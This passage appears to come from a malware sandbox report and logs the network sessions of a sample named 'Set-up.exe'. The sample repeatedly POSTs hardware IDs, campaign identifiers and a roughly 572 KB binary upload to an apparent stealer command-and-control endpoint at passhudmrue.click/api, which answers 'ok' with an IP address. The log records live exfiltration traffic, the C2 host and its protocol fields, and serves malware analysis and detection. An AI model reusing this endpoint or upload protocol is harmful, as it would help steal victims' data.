                                                                                                                      Set-Cookie: PHPSESSID=redevm1kdu8dmn7qdg1l6nclqi; expires=Thu, 01 May 2025 11:40:11 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVqItzG4dOWvx%2F77P0jkp%2BoyzG7okGm2pTNLDUqb0H0iPU18T56uZqJLKToXZzWoEeHFoFX3w4uFCHdBUhCJ7vc0AnhiRFfuPWrEo9MrhaYOaTC6kPsKbLpr1fhmD9yrrwffTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd55412cbd50f4d-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1522&rtt_var=582&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13806&delivery_rate=1859872&cwnd=217&unsent_bytes=0&cid=ea397b3752e58d31&ts=554&x=0"
                                                                                                                      2025-01-05 17:53:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2025-01-05 17:53:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.649799172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:33 UTC273OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=WIUPQMPL
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 15044
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:33 UTC15044OUTData Raw: 2d 2d 57 49 55 50 51 4d 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 57 49 55 50 51 4d 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 49 55 50 51 4d 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 57 49 55 50 51 4d 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                      Data Ascii: --WIUPQMPLContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--WIUPQMPLContent-Disposition: form-data; name="pid"2--WIUPQMPLContent-Disposition: form-data; name="lid"hRjzG3--DRON--WIUPQMPLContent-Dispositi
                                                                                                                      2025-01-05 17:53:41 UTC1135INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:41 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=42211m9kpikgr3ujc78n371ah8; expires=Thu, 01 May 2025 11:40:20 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BcSne1Wd8S%2F6RGoN1HQTNadzVVNzu4Z9VpXtAAHhes3CSaNAlPcqcWfOcNbYQByhxHIyL%2FzvmPLUwZTOlQf5DXx7yQPGF4jFCnV%2FEBnkJHGJUDRSTuLPiiY8aTkxKKiVFkDxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5541a0c0a438b-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1639&rtt_var=659&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15975&delivery_rate=1606160&cwnd=169&unsent_bytes=0&cid=5d5dc5226c4459fd&ts=7950&x=0"
                                                                                                                      2025-01-05 17:53:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2025-01-05 17:53:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.649851172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:42 UTC281OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=NF6QEJRIK626LVRM
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 19950
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:42 UTC15331OUTData Raw: 2d 2d 4e 46 36 51 45 4a 52 49 4b 36 32 36 4c 56 52 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 4e 46 36 51 45 4a 52 49 4b 36 32 36 4c 56 52 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 46 36 51 45 4a 52 49 4b 36 32 36 4c 56 52 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 4e 46 36
                                                                                                                      Data Ascii: --NF6QEJRIK626LVRMContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--NF6QEJRIK626LVRMContent-Disposition: form-data; name="pid"3--NF6QEJRIK626LVRMContent-Disposition: form-data; name="lid"hRjzG3--DRON--NF6
                                                                                                                      2025-01-05 17:53:42 UTC4619OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00
                                                                                                                      Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                                      2025-01-05 17:53:42 UTC1128INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:42 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=vif0r1jnsb4sv6dca1dukiakf9; expires=Thu, 01 May 2025 11:40:21 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hbJC0uNBhcHhIZtiOwUbVFJmI6qwBmF5BcJz5mJkkgzCwjDjV9VVd19xQ1JHYm11En9v0ed3qtDrNy4LnJ8fZ8RAPT9djExT8Y5w4SZJxFkIBh%2BItoE3SOHtlK4pPGrPZP8yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5544fcf07729e-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1829&rtt_var=689&sent=9&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20911&delivery_rate=1584373&cwnd=165&unsent_bytes=0&cid=9eef78e338e7f7e8&ts=608&x=0"
                                                                                                                      2025-01-05 17:53:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2025-01-05 17:53:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.649864172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:44 UTC282OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=3YYU6JSELTHBZSEBED
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 5475
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:44 UTC5475OUTData Raw: 2d 2d 33 59 59 55 36 4a 53 45 4c 54 48 42 5a 53 45 42 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 33 59 59 55 36 4a 53 45 4c 54 48 42 5a 53 45 42 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 59 59 55 36 4a 53 45 4c 54 48 42 5a 53 45 42 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d
                                                                                                                      Data Ascii: --3YYU6JSELTHBZSEBEDContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--3YYU6JSELTHBZSEBEDContent-Disposition: form-data; name="pid"1--3YYU6JSELTHBZSEBEDContent-Disposition: form-data; name="lid"hRjzG3--DRON
                                                                                                                      2025-01-05 17:53:44 UTC1135INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:44 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=3vikbcba94sctu40dneus3jepa; expires=Thu, 01 May 2025 11:40:23 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gezjazJquZkHsEbPSQfTNO1qV%2FFZNK%2BiRhKsQLt%2Fkf8nQPGAORczVGYOZVGme6qqry%2BiYWiPS%2BrJzqI9v2VLsx4zCSFoPwFdG0s0ehkTKxA5PSNT2Z4lKmzeHhZ1OvB4UnVNWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5545b3c144406-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1680&rtt_var=1131&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2843&recv_bytes=6393&delivery_rate=792401&cwnd=186&unsent_bytes=0&cid=5be641c182cf49a5&ts=738&x=0"
                                                                                                                      2025-01-05 17:53:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2025-01-05 17:53:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.649875172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:45 UTC273OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=94KFIXWAMD
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 911
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:45 UTC911OUTData Raw: 2d 2d 39 34 4b 46 49 58 57 41 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 39 34 4b 46 49 58 57 41 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 34 4b 46 49 58 57 41 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 39 34 4b 46 49 58 57 41 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                      Data Ascii: --94KFIXWAMDContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--94KFIXWAMDContent-Disposition: form-data; name="pid"1--94KFIXWAMDContent-Disposition: form-data; name="lid"hRjzG3--DRON--94KFIXWAMDContent-D
                                                                                                                      2025-01-05 17:53:45 UTC1126INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=6rk44kpmdrfkdt64culeckgerk; expires=Thu, 01 May 2025 11:40:24 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EtvPjXRoybZsLivdIREqNUBzWRpyvgsJRn6J8QGmwPlaGKYwHNIu432%2Bg1vepSHnBnLcGvvzVyqKiXUVC44GjBoIAavyqxqJ3l86pHrZIDF2DZQtMn3F6zr64H0IEpXysWFPng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5546388586a53-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2046&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1820&delivery_rate=1396461&cwnd=222&unsent_bytes=0&cid=daca1a5769595bd3&ts=470&x=0"
                                                                                                                      2025-01-05 17:53:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2025-01-05 17:53:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.649884172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:46 UTC274OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=QNDAGIME
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 572454
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 2d 2d 51 4e 44 41 47 49 4d 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 51 4e 44 41 47 49 4d 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 4e 44 41 47 49 4d 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 51 4e 44 41 47 49 4d 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                      Data Ascii: --QNDAGIMEContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--QNDAGIMEContent-Disposition: form-data; name="pid"1--QNDAGIMEContent-Disposition: form-data; name="lid"hRjzG3--DRON--QNDAGIMEContent-Dispositi
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: a3 f2 b3 74 d1 08 9f d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a fb 4a 31 24 a9 f4 f5 55 cb 8b 66 6a 05 5f ac 7b fa 3d b9 3f 26 e7 eb 7e ad 3f 95 1e 8e 08 4d c4 ee 2a 2d 89 24 89 7e 45 68 82 01 f3 63 85 59 b4 da 3e 24 e9 1f
                                                                                                                      Data Ascii: tCXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+|`Km{<|*47H2Q0,0Mtm u`/2$woXpEo4JJ1$Ufj_{=?&~?M*-$~EhcY>$
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 0a d1 db f4 1f be a2 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0 a2 bc 23 f2 c1 7e ef a0 20 d8 af 71 f2 d9 0e 23 ef 4f fb 30 30 b7 6a 1f e3 4c 7e 9c c7 3e 06 f9 cc 71 10 ea f5 ab b0 be ee 9d e0 d4 07 0c 90 fc 2a 8c 15 8a a7
                                                                                                                      Data Ascii: Q/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{]*[sJ*{?6#~ q#O00jL~>q*
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: e0 c3 7f 69 f3 4f fa aa d7 37 be e4 c6 31 05 ac 0b 91 ac 8a b9 57 8e c9 62 e2 7d 11 9b 24 dd b4 94 ea 4a 19 cf 86 de 80 a2 66 e8 5f e6 c4 9f 2d b0 d4 67 f9 14 46 9b f1 b3 09 87 01 66 dd 9f d1 74 cf ad d3 87 1b 79 e7 bf a2 22 ad 9f ef 90 7c 31 03 80 67 a7 e2 0c e6 2b 27 eb 9e ff e6 b2 fe 9b c8 e9 d3 be a5 94 ac 8d 6e da 65 bd f1 9e 96 d1 17 92 be e7 c2 e0 cf ab f1 6c 18 e2 96 8c e2 3c 56 dd 8e e9 c0 bb b8 e0 c9 57 17 cc 0c 56 64 6d 47 ed a8 0e 8e 96 38 1b 15 90 cc 5d f6 34 5d bb f7 85 fa 93 35 90 67 4a 9f 7b 54 bc 73 77 ff d7 21 fb ed 00 fd 9d c2 12 30 9c f8 19 49 a2 29 d0 8c f8 81 2e 3f 14 cd 0b 26 ca b3 35 d0 dd 3c cc 59 04 50 42 52 f0 d7 a4 8e 27 f3 57 65 4a 00 4d 38 02 02 3d 42 e7 8a 79 a0 1c fe 76 34 42 08 08 08 c3 fe b7 b3 b8 48 ad c0 0e 9d ed 61 a8
                                                                                                                      Data Ascii: iO71Wb}$Jf_-gFfty"|1g+'nel<VWVdmG8]4]5gJ{Tsw!0I).?&5<YPBR'WeJM8=Byv4BHa
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 66 bb 25 86 7f 5d 4a 52 c7 f4 69 88 03 97 a7 52 a7 af 82 29 d6 0e 4f fd 03 6d dd c4 16 f3 2b 54 f5 0b 35 06 d5 46 ad 8c 95 88 d6 ff 6d 5d 47 70 dd b5 cc 38 15 1e a1 52 75 3a 13 03 b2 ca 11 6f fe 9f 50 fd 7f 72 b6 01 9c 66 66 4b 11 01 73 18 70 0d 3d 35 62 2f 09 35 bd dc ee fa c5 09 58 c0 01 39 86 84 ec 86 1d 4b 04 08 dd ce 57 85 82 94 e0 74 e1 15 03 40 46 84 89 82 03 5d 77 80 69 77 7d 30 86 ad 86 6a 39 e5 6f 54 38 d4 32 87 ff 67 12 d5 8b 3e 3a d4 2a 5e 80 8c 79 25 41 fe 60 06 e1 e4 33 ea 42 8c be cb 05 bd 9e cd 77 17 c5 11 65 c8 69 5a 6c 2b ae d7 51 38 79 d0 30 a5 3a 56 e9 86 e8 14 4a c0 82 48 45 6c 1e 5e 6a a7 23 88 ec 8b 3e d6 9b b3 1f 37 c3 75 b9 3b 6b 15 54 d8 14 10 2b 39 89 9b 7b fd 90 cd d6 88 a3 c3 b7 f8 8b 82 c6 d1 85 ef bc 12 0a 1d e2 56 66 f4 14
                                                                                                                      Data Ascii: f%]JRiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl^j#>7u;kT+9{Vf
